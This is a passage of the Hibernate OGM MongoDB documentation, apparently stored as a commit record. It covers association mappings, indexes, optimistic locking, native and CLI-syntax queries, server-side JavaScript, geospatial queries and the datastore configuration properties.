\"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"owner0001\" ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"Basket_Product\"\n },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n \/\/ It will change the value stored in the field table in the Associations collection\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"BasketContent\"\n },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\n.Unidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner0001\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"owner0001\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner0001\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[ogm-mongodb-indexes-unique-constraints]]\n=== Indexes and unique constraints\n\n==== Standard indexes and unique constraints\n\nYou can create your index and unique constraints in MongoDB using the standard JPA annotations.\n\n.Creating indexes and unique constraints using JPA annotations\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_idx\", unique = true),\n @Index(columnList = \"name DESC\", name = \"name_desc_idx\")\n})\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n @Column(unique = true)\n private String url;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n[NOTE]\n====\nMongoDB supports unique constraints via unique indexes. It considers `null` as a value to be unique: you can only\nhave one `null` value per unique index. This is not what is commonly accepted as the definition of a unique constraint in\nthe JPA world. Thus, by default, we create the unique indexes as `sparse`: it only indexes defined values so that the\nunique constraints accept multiple `null` values.\n====\n\n==== Using MongoDB specific index options\n\nMongoDB supports https:\/\/docs.mongodb.com\/manual\/reference\/method\/db.collection.createIndex\/[a number of options for\nindex creation].\n\nIt is possible to define them using the `@IndexOption` annotation.\n\n.Creating indexes with MongoDB specific options\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author\", name = \"author_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_idx\", options = \"{ background : true, sparse : true, partialFilterExpression : { author: 'Verlaine' } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n`@IndexOption` simply passes the options to MongoDB at index creation: you can use every option available in MongoDB.\n\n==== Full text indexes\n\nMongoDB supports the ability to create one (and only one) full text index per collection.\n\nAs JPA does not support the ability to define `text` as an order in the `@Index` annotation (only `ASC` and `DESC`\nare supported), this ability has been included inside the `@IndexOption` mechanism. You simply need to add `text: true`\nto the options passed to MongoDB, Hibernate OGM interprets it and translates the index to a full text index.\n\n.Creating a full text index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_text_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_name_text_idx\", options = \"{ text: true, default_language : 'fr', weights : { author: 2, name: 5 } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n=== Transactions\n\nMongoDB does not support transactions.\nOnly changes applied to the same document are done atomically.\nA change applied to more than one document will not be applied atomically.\nThis problem is slightly mitigated by the fact that Hibernate OGM queues all changes\nbefore applying them during flush time.\nSo the window of time used to write to MongoDB is smaller than what you would have done manually.\n\nWe recommend that you still use transaction demarcations with Hibernate OGM\nto trigger the flush operation transparently (on commit).\nBut do not consider rollback as a possibility, this won't work.\n\n[[ogm-mongodb-optimisticlocking]]\n=== Optimistic Locking\n\nMongoDB does not provide a built-in mechanism for detecting concurrent updates to the same document\nbut it provides a way to execute atomic find and update operations.\nBy exploiting this commands Hibernate OGM can detect concurrent modifications to the same document.\n\nYou can enable optimistic locking detection using the annotation `@Version`:\n\n.Optimistic locking detection via `@Version`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"version\" : 0\n}\n----\n====\n\nThe `@Version` annotation define which attribute will keep track of the version of the document,\nHibernate OGM will update the field when required and if two changes from two different sessions (for example)\nare applied to the same document a `org.hibernate.StaleObjectStateException` is thrown.\n\nYou can use `@Column` to change the name of the field created on MongoDB:\n\n.Optimistic locking detection via `@Version` using `@Column`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n @Column(name=\"OPTLOCK\")\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"OPTLOCK\" : 0\n}\n----\n====\n\n[[ogm-mongodb-queries]]\n=== Queries\n\nYou can express queries in a few different ways:\n\n* using JPQL\n* using a native MongoQL query\n* using a Hibernate Search query (brings advanced full-text and geospatial queries)\n\nWhile you can use JPQL for simple queries, you might hit limitations.\nThe current recommended approach is to use native MongoQL\nif your query involves nested (list of) elements.\n\nMongoDB doesn't require Hibernate Search to run queries.\n\n[NOTE]\n====\nIn order to reflect changes performed in the current session,\nall entities affected by a given query are flushed to the datastore prior to query execution\n(that's the case for Hibernate ORM as well as Hibernate OGM).\n\nFor not fully transactional stores such as MongoDB\nthis can cause changes to be written as a side-effect of running queries\nwhich cannot be reverted by a possible later rollback.\n\nDepending on your specific use cases and requirements you may prefer to disable auto-flushing,\ne.g. by invoking `query.setFlushMode( FlushMode.MANUAL )`.\nBear in mind though that query results will then not reflect changes applied within the current session.\n====\n\n==== JPQL queries\n\nHibernate OGM is a work in progress, so only a sub-set of JPQL constructs is available\nwhen using the JPQL query support. This includes:\n\n* simple comparisons using \"<\", \"+<=+\", \"=\", \">=\" and \">\"\n* `IS NULL` and `IS NOT NULL`\n* the boolean operators `AND`, `OR`, `NOT`\n* `LIKE`, `IN` and `BETWEEN`\n* `ORDER BY`\n* inner `JOIN` on embedded collections\n* projections of regular and embedded properties\n\nQueries using these constructs will be transformed into equivalent native MongoDB queries.\n\n[NOTE]\n====\nLet us know <<ogm-howtocontribute,by opening an issue or sending an email>>\nwhat query you wish to execute.\nExpanding our support in this area is high on our priority list.\n====\n\n[[ogm-mongodb-queries-native]]\n==== Native MongoDB queries\n\nHibernate OGM also supports certain forms of native queries for MongoDB.\nCurrently two forms of native queries are available via the MongoDB backend:\n\n* find queries specifying the search criteria only\n* queries specified using the MongoDB CLI syntax (<<ogm-mongodb-cli-syntax>>)\n\nThe former always maps results to entity types.\nThe latter either maps results to entity types or to certain supported forms of projection.\nNote that parameterized queries are not supported by MongoDB, so don't expect `Query#setParameter()` to work.\n\nYou can execute native queries as shown in the following example:\n\n.Using the JPA API\n====\n[source, JAVA]\n----\n@Entity\npublic class Poem {\n\n @Id\n private Long id;\n\n private String name;\n\n private String author;\n\n \/\/ getters, setters ...\n}\n\n...\n\njavax.persistence.EntityManager em = ...\n\n\/\/ criteria-only find syntax\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = (Poem) em.createNativeQuery( query1, Poem.class ).getSingleResult();\n\n\/\/ criteria-only find syntax with order-by\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = em.createNativeQuery( query2, Poem.class ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query3 = \"db.WILDE_POEM.find(\" +\n \"{ '$query' : { 'name' : 'Athanasia' }, '$orderby' : { 'name' : 1 } }\" +\n \"{ 'name' : 1 }\" +\n \")\";\n\n\/\/ will contain name and id as MongoDB always returns the id for projections\nList<Object[]> poemNames = (List<Object[]>)em.createNativeQuery( query3 ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query4 = \"db.WILDE_POEM.count({ 'name' : 'Athanasia' })\";\n\nObject[] count = (Object[])em.createNativeQuery( query4 ).getSingleResult();\n----\n====\n\nThe result of a query is a managed entity (or a list thereof) or a projection of attributes in form of an object array,\njust like you would get from a JPQL query.\n\n.Using the Hibernate native API\n====\n[source, JAVA]\n----\nOgmSession session = ...\n\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = session.createNativeQuery( query1 )\n .addEntity( \"Poem\", Poem.class )\n .uniqueResult();\n\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = session.createNativeQuery( query2 )\n .addEntity( \"Poem\", Poem.class )\n .list();\n----\n====\n\nNative queries can also be created using the `@NamedNativeQuery` annotation:\n\n.Using @NamedNativeQuery\n====\n[source, JAVA]\n----\n@Entity\n@NamedNativeQuery(\n name = \"AthanasiaPoem\",\n query = \"{ $and: [ { name : 'Athanasia' }, { author : 'Oscar Wilde' } ] }\",\n resultClass = Poem.class )\npublic class Poem { ... }\n\n...\n\n\/\/ Using the EntityManager\nPoem poem1 = (Poem) em.createNamedQuery( \"AthanasiaPoem\" )\n .getSingleResult();\n\n\/\/ Using the Session\nPoem poem2 = (Poem) session.getNamedQuery( \"AthanasiaPoem\" )\n .uniqueResult();\n----\n====\n\nHibernate OGM stores data in a natural way so you can still execute queries using the\nMongoDB driver, the main drawback is that the results are going to be raw MongoDB\ndocuments and not managed entities.\n\n[[ogm-mongodb-cli-syntax]]\n\n===== CLI Syntax\n\nHibernate OGM can execute native queries expressed using the MongoDB CLI syntax with some limitations.\nCurrently `find()`, `findOne()`, `findAndModify()`, and `count()` queries are supported. Furthermore, three\ntypes of write queries are supported via the CLI syntax: `insert()`, `remove()`, and `update()`. Other query\ntypes may be supported in future versions.\n\nAs one would expect, `find()`, `findOne()`, `findAndModify()`, `aggregate`,\n`distinct()`, and `count()` can be executed using\n`javax.persistence.Query.getSingleResult()` or `javax.persistence.Query.getResultList()`, while `insert()`,\n`remove()`, and `update()` require using `javax.persistence.Query.executeUpdate()`. Also note that,\n`javax.persistence.Query.executeUpdate()` may return `-1` in case execution of a query was not acknowledged\nrelative to the write concern used.\nVia `javax.persistence.Query.executeUpdate()` it is also possible to run `db.Collection.drop()`\nqueries.\n\n[NOTE]\n====\n`db.Collection.drop()` will always return 1. This is because the underlying driver we are\nusing doesn't return any value after the execution of the operation.\n====\n\n\nThe following functions can be used in the provided JSON:\n`BinData`, `Date`, `HexData`, `ISODate`, `NumberLong`, `ObjectId`, `Timestamp`,\n`RegExp`, `DBPointer`, `UUID`, `GUID`, `CSUUID`, `CSGUID`, `JUUID`, `JGUID`, `PYUUID`, `PYGUID`.\n\n[NOTE]\n====\n`NumberInt` is not supported as it is currently not supported by the MongoDB Java driver.\n====\n\nNo cursor operations such as `sort()` are supported.\nInstead use the corresponding MongoDB http:\/\/docs.mongodb.org\/manual\/reference\/operator\/query-modifier\/[query modifiers]\nsuch as `$orderby` within the criteria parameter.\n\nYou can limit the results of a query using the `setMaxResults(...)` method.\n\nJSON parameters passed via the CLI syntax must be specified using the\nhttp:\/\/docs.mongodb.org\/manual\/reference\/mongodb-extended-json\/[strict mode].\nSpecifically, keys need to be given within quotes; the only relaxation of this is that single quotes\nmay be used when specifying attribute names\/values to facilitate embedding queries within\nJava strings.\n\nNote that results of projections are returned as retrieved from the MongoDB driver at the moment and\nare not (yet) converted using suitable Hibernate OGM type implementations.\nThis requirement is tracked under https:\/\/hibernate.atlassian.net\/browse\/OGM-1031[OGM-1031].\n\n.CLI syntax examples\n====\n[source, JAVA]\n----\n\n\/\/ Valid syntax\nString valid = \"db.Poem.find({ \\\"name\\\" : \\\"Athanasia\\\" })\";\n\nString alsoValid = \"db.Poem.find({ '$or' : [{'name': 'Athanasia' }, {'name': 'Portia' }]})\";\n\nString validAggregation = \"db.Poem.aggregate([{ '$match': {'author': { '$regex': 'oscar.*', '$options': 'i' } } }, { '$sort': {'name': -1 } } ])\";\n\n\/\/ NOT Valid syntax, it will throw an exception: com.mongodb.util.JSONParseException\nString notValid = \"db.Poem.find({ name : \\\"Athanasia\\\" })\";\n\nString alsoNotValid = \"db.Poem.find({ $or : [{name: 'Athanasia' }, {name: 'Portia' }]})\";\n\n----\n====\n\n.CLI syntax sort and limit results alternatives\n====\n[source, JAVA]\n----\nString nativeQuery = \"db.Poem.find({ '$query': { 'author': 'Oscar Wilde' }, '$orderby' : { 'name' : 1 } })\";\n\n\/\/ Using hibernate session\nList<Poem> result = session.createNativeQuery( nativeQuery )\n\t.addEntity( Poem.class )\n\t.setMaxResults( 2 )\n\t.list();\n\n\/\/ Using JPA entity manager\nList<Poem> results = em.createNativeQuery( nativeQuery, Poem.class )\n\t.setMaxResults( 2 )\n\t.getResultList();\n----\n====\n\n.CLI syntax update examples\n====\n[source, JAVA]\n----\nString updateQuery = \"db.Poem.findAndModify({ 'query': {'_id': 1}, 'update': { '$set': { 'author': 'Oscar Wilde' } }, 'new': true })\";\nList<Poem> updated = session.createNativeQuery( updateQuery ).addEntity( Poem.class ).list();\n\nString insertQuery = \"db.Poem.insert({ '_id': { '$numberLong': '11' }, 'author': 'Oscar Wilder', 'name': 'The one and wildest', 'rating': '1' } )\";\nint inserted = session.createNativeQuery( insertQuery ).executeUpdate();\n\nString removeQuery = \"db.Poem.remove({ '_id': { '$numberLong': '11' } })\";\nint removed = session.createNativeQuery( removeQuery ).executeUpdate();\n----\n====\n\n[WARNING]\n====\nSupport for the `$regexp` operator is limited to the string syntax. We do not support the `\/pattern\/` syntax as it is not\ncurrently supported by the MongoDB Java driver.\n\n[source, JAVA]\n----\n\/\/ Valid syntax\nString nativeQuery = \"{ $query : { author : { $regex : '^Oscar' } }, $orderby : { name : 1 } }\";\nList<Poem> result = session.createNativeQuery( nativeQuery ).addEntity( Poem.class ).list();\n----\n====\n\n[[ogm-mongodb-stored-proc-native]]\n\n==== Server-side JavaScript and stored procedures\n\n[NOTE]\n====\nThis is an experimental feature.\n====\n\nIn MongoDB, it is possible to call server-side JavaScript as if it is a stored procedure.\nYou can use the existing methods in JPA:\n\n.Calling server-side JavaScript with positional parameters\n====\n[source, JAVA]\n----\n @Entity\n public class Car {\n @Id\n private Integer id;\n\n private String brand;\n\n ...\n }\n\n EntityManager em = ...\n StoredProcedureQuery storedProcedureQuery = em.createStoredProcedureQuery( \"findMostExpensiveCars\", Car.class );\n storedProcedureQuery.registerStoredProcedureParameter( \"year\", Integer.class, ParameterMode.IN );\n storedProcedureQuery.setParameter( \"year\", 1995 );\n List<Car> cars = storedProcedureQuery.getResultList();\n----\n====\n\nThis example will work assuming that there is a `findMostExpensiveCars` JavaScript function in MongoDB \nand that the result of the function is a list of cars that can be mapped to the `Car` entity.\n\n.Calling server-side JavaScript with Hibernate OGM with positional parameters\n====\n[source, JSON]\n----\n{\n \"result\" : [\n { \"id\":1, \"brand\":\"Bentley\" },\n { \"id\":2, \"brand\":\"Maserati\" },\n ]\n}\n----\n====\n\nMore details about server-side functions can be found in\nhttps:\/\/docs.mongodb.com\/manual\/core\/server-side-JavaScript[the MongoDB reference documentation].\n\n==== Hibernate Search\n\nYou can index your entities using Hibernate Search.\nThat way, a set of secondary indexes independent of MongoDB is maintained by Hibernate Search\nand you can run Lucene queries on top of them.\nThe benefit of this approach is a nice integration at the JPA \/ Hibernate API level\n(managed entities are returned by the queries).\nThe drawback is that you need to store the Lucene indexes somewhere\n(file system, infinispan grid, etc).\nHave a look at the Infinispan section (<<ogm-infinispan-indexstorage>>)\nfor more info on how to use Hibernate Search.\n\n=== Geospatial support\n\n==== Geospatial fields\n\nOur MongoDB integration supports the ability to declare geospatial fields by using specific Java types that will be\nautomatically converted to GeoJSON objects stored in MongoDB.\n\nWe currently support the following types:\n\n * `GeoPoint`, stored as a GeoJSON Point\n * `GeoMultiPoint`, stored as a GeoJSON MultiPoint\n * `GeoLineString`, stored as a GeoJSON LineString\n * `GeoMultiLineString`, stored as a GeoJSON MultiLineString\n * `GeoPolygon`, stored as a GeoJSON Polygon\n * `GeoMultiPolygon`, stored as a GeoJSON MultiPolygon\n\nYou can find more information about these types and their constraints in the\nhttps:\/\/docs.mongodb.com\/manual\/reference\/geojson\/[MongoDB documentation].\n\n.Declaring a geospatial field\n====\n[source, JAVA]\n----\n@Entity\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nThese Java types come with handy constructors and helpers to help manipulate them.\n\n.Instantiating a polygon\n====\n[source, JAVA]\n----\nGeoPolygon polygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n----\n====\n\n==== Geospatial indexes and queries\n\nTo be able to run optimized queries on geospatial fields, you need to declare spatial indexes.\n\nYou can leverage your usual annotations to declare the indexes directly on your entities.\n\n.Declaring a geospatial index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n\t\t@Index(columnList = \"location\", name = \"location_spatial_idx\")\n})\n@IndexOptions(\n\t\t@IndexOption(forIndex = \"location_spatial_idx\", options = \"{ _type: '2dsphere' }\")\n)\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nNote that you need to precise the type of the index using an `@IndexOption` annotation.\n\nThe next step is to execute a geospatial query using a native query.\n\n.Finding entities around a point\n====\n[source, JAVA]\n----\nGeoPoint geoPoint = new GeoPoint( 4.8520035, 45.7498209 );\n\nQuery query = session\n .createNativeQuery( \"{ location: { $near: { $geometry: \" + geoPoint.toBsonDocument() + \", $maxDistance: 500 } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\n.Finding entities within a polygon\n====\n[source, JAVA]\n----\nGeoPolygon geoPolygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n\nQuery query = session\n .createNativeQuery( \"{ location: { $geoWithin: { $geometry: \" + geoPolygon.toBsonDocument() + \" } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\nTo learn more about MongoDB spatial indexes and queries, please refer to the\nhttps:\/\/docs.mongodb.com\/manual\/geospatial-queries\/[MongoDB documentation].\n","old_contents":"[[ogm-mongodb]]\n\n== MongoDB\n\nhttp:\/\/www.mongodb.org[MongoDB] is a document oriented datastore\nwritten in C++ with strong emphasis on ease of use.\nThe nested nature of documents make it a particularly natural fit for most object representations.\n\nThis implementation is based upon the MongoDB Java driver.\nThe currently supported version is {mongodb-version}.\n\n=== Why should I use Hibernate OGM with MongoDB\n\nIt is possible that in your project you have some entities that might benefit from MongoDB\ndynamic schema, but having a schema makes it possible to obtain better performance because\nthe datastore can use the information of the schema to apply some optimizations that\nwouldn't be otherwise possible.\n\nJPA already has ways to define constraints and indexes and via Hibernate OGM you can\nuse the same annotations for both your relational and not relational needs.\n\nHibernate OGM cannot make MongoDB transactional but by using the JPA transaction demarcation\nmechanism it can group the operations and flush them to the datastore to\nminimize the number of requests.\n\nAnother benefit of using Hibernate OGM with MongoDB is that it will also make it possible\nto use Hibernate Search out of the box. Hibernate Search brings the power of Lucene\nto your project, giving you the ability to run fast google-like searches.\n\nThis means that you can query the datastore using:\n\n* JPQL queries (see <<ogm-jpql-query>>)\n* MongoDB native queries (see <<ogm-mongodb-queries-native>>)\n* Full-text queries (see <<ogm-query-using-hibernate-search>>)\n\nOne of Hibernate OGM main goal is to map entities in a \"natural\" way, this means that your\ndatastore will still be accessible in case you need to use other tools or want to run\nnative queries occasionally.\n\n=== Configuring MongoDB\n\nConfiguring Hibernate OGM to use MongoDb is easy:\n\n* Add the MongoDB module and driver to the classpath\n* provide the MongoDB URL to Hibernate OGM\n\n==== Adding MongoDB dependencies\n\nTo add the dependencies via Maven, add the following module:\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-mongodb<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nThis will pull the MongoDB driver transparently.\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* `\/lib\/required`\n* `\/lib\/mongodb`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\nMongoDB does not require Hibernate Search for the execution of JPQL or HQL queries.\n\n==== MongoDB specific configuration properties\n\nTo get started quickly, pay attention to the following options:\n\n* `hibernate.ogm.datastore.provider`\n* `hibernate.ogm.datastore.host`\n* `hibernate.ogm.datastore.database`\n\nAnd we should have you running.\nThe following properties are available to configure MongoDB support:\n\n.MongoDB datastore configuration properties\nhibernate.ogm.datastore.provider::\nTo use MongoDB as a datastore provider, this property must be set to `mongodb`\nhibernate.ogm.option.configurator::\nThe fully-qualified class name or an instance of a programmatic option configurator (see <<ogm-mongodb-programmatic-configuration>>)\nhibernate.ogm.datastore.host::\nThe hostname and port of the MongoDB instance.\nThe optional port is concatenated to the host and separated by a colon.\nWhen using replica sets, you can define the various servers in a comma separated list of hosts and ports.\nLet's see a few valid examples:\n\n* `mongodb.example.com`\n* `mongodb.example.com:27018`\n* `2001:db8::ff00:42:8329` (IPv6)\n\n* `[2001:db8::ff00:42:8329]:27018` (IPv6 with port requires the IPv6 to be surrounded by square brackets)\n* `www.example.com, www2.example.com:123, 192.0.2.1, 192.0.2.2:123, 2001:db8::ff00:42:8329, [2001:db8::ff00:42:8329]:123` (replica set)\n+\nThe default value is `127.0.0.1:27017`. If left undefined, the default port is `27017`.\nhibernate.ogm.datastore.port::\nDeprecated: use `hibernate.ogm.datastore.host`.\nThe port used by the MongoDB instance.\nIgnored when multiple hosts are defined.\nThe default value is `27017`.\nhibernate.ogm.datastore.database::\nThe database to connect to. This property has no default value.\nhibernate.ogm.datastore.create_database::\nIf set to true, the database will be created if it doesn't exist.\nThis property default value is false.\nhibernate.ogm.datastore.username::\nThe username used when connecting to the MongoDB server.\nThis property has no default value.\nhibernate.ogm.datastore.password::\nThe password used to connect to the MongoDB server.\nThis property has no default value.\nThis property is ignored if the username isn't specified.\nhibernate.ogm.error_handler::\nThe fully-qualified class name, class object or an instance of `ErrorHandler` to get notified upon errors during flushes (see <<ogm-api-error-handler>>)\nhibernate.ogm.mongodb.driver.*::\nDefines a prefix for all options which should be passed through to the MongoDB driver.\nFor available options refer to the JavaDocs of link:http:\/\/api.mongodb.org\/java\/3.0\/com\/mongodb\/MongoClientOptions.Builder.html[MongoClientOptions.Builder]. All `String`, `int` and `boolean` properties\ncan be set, eg `hibernate.ogm.mongodb.driver.serverSelectionTimeout`.\nhibernate.ogm.mongodb.authentication_database::\nDefines the name of the authentication database, default value is _admin_.\nhibernate.ogm.mongodb.authentication_mechanism::\nDefines the authentication mechanism to use. Possible values are:\n\n* `BEST`: Handshakes with the server to find the best authentication mechanism.\n* `SCRAM_SHA_1`: The SCRAM SHA 1 Challenge Response mechanism as described in this link:http:\/\/tools.ietf.org\/html\/rfc5802[RFC].\n* `MONGODB_CR`: The MongoDB Challenge Response mechanism (deprecated since MongoDB 3)\n* `GSSAPI`: The GSSAPI mechanism. See the http:\/\/tools.ietf.org\/html\/rfc4752[RFC]\n* `MONGODB_X509`: The MongoDB X.509\n* `PLAIN`: The PLAIN mechanism. See the http:\/\/www.ietf.org\/rfc\/rfc4616.txt[RFC]\nhibernate.ogm.datastore.document.association_storage::\nDefines the way OGM stores association information in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.AssociationStorageType` enum):\n\n* `IN_ENTITY`: store association information within the entity\n* `ASSOCIATION_DOCUMENT`: store association information in a dedicated document per association\n\n+\n`IN_ENTITY` is the default and recommended option\nunless the association navigation data is much bigger than the core of the document and leads to performance degradation.\nhibernate.ogm.mongodb.association_document_storage::\nDefines how to store assocation documents (applies only if the `ASSOCIATION_DOCUMENT`\nassociation storage strategy is used).\nPossible strategies are (values of the `org.hibernate.ogm.datastore.mongodb.options.AssociationDocumentStorageType` enum):\n\n* `GLOBAL_COLLECTION` (default): stores the association information in a unique MongoDB collection for all associations\n* `COLLECTION_PER_ASSOCIATION` stores the association in a dedicated MongoDB collection per association\n\nhibernate.ogm.datastore.document.map_storage::\nDefines the way OGM stores the contents of map-typed associations in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.MapStorageType` enum):\n\n* `BY_KEY`: map-typed associations with a single key column which is of type `String` will be stored as a sub-document,\norganized by the given key; Not applicable for other types of key columns, in which case always `AS_LIST` will be used\n* `AS_LIST`: map-typed associations will be stored as an array containing a sub-document for each map entry.\nAll key and value columns will be contained within the array elements\n\nhibernate.ogm.mongodb.write_concern::\nDefines the write concern setting to be applied when issuing writes against the MongoDB datastore.\nPossible settings are (values of the `WriteConcernType` enum):\n`ACKNOWLEDGED`, `UNACKNOWLEDGED`, `FSYNCED`, `JOURNALED`, `REPLICA_ACKNOWLEDGED`, `MAJORITY` and `CUSTOM`.\nWhen set to `CUSTOM`, a custom `WriteConcern` implementation type has to be specified.\n+\nThis option is case insensitive and the default value is `ACKNOWLEDGED`.\nhibernate.ogm.mongodb.write_concern_type::\nSpecifies a custom `WriteConcern` implementation type (fully-qualified name, class object or instance).\nThis is useful in cases where the pre-defined configurations are not sufficient,\ne.g. if you want to ensure that writes are propagated to a specific number of replicas or given \"tag set\".\nOnly takes effect if `hibernate.ogm.mongodb.write_concern` is set to `CUSTOM`.\nhibernate.ogm.mongodb.read_preference::\nSpecifies the `ReadPreference` to be applied when issuing reads against the 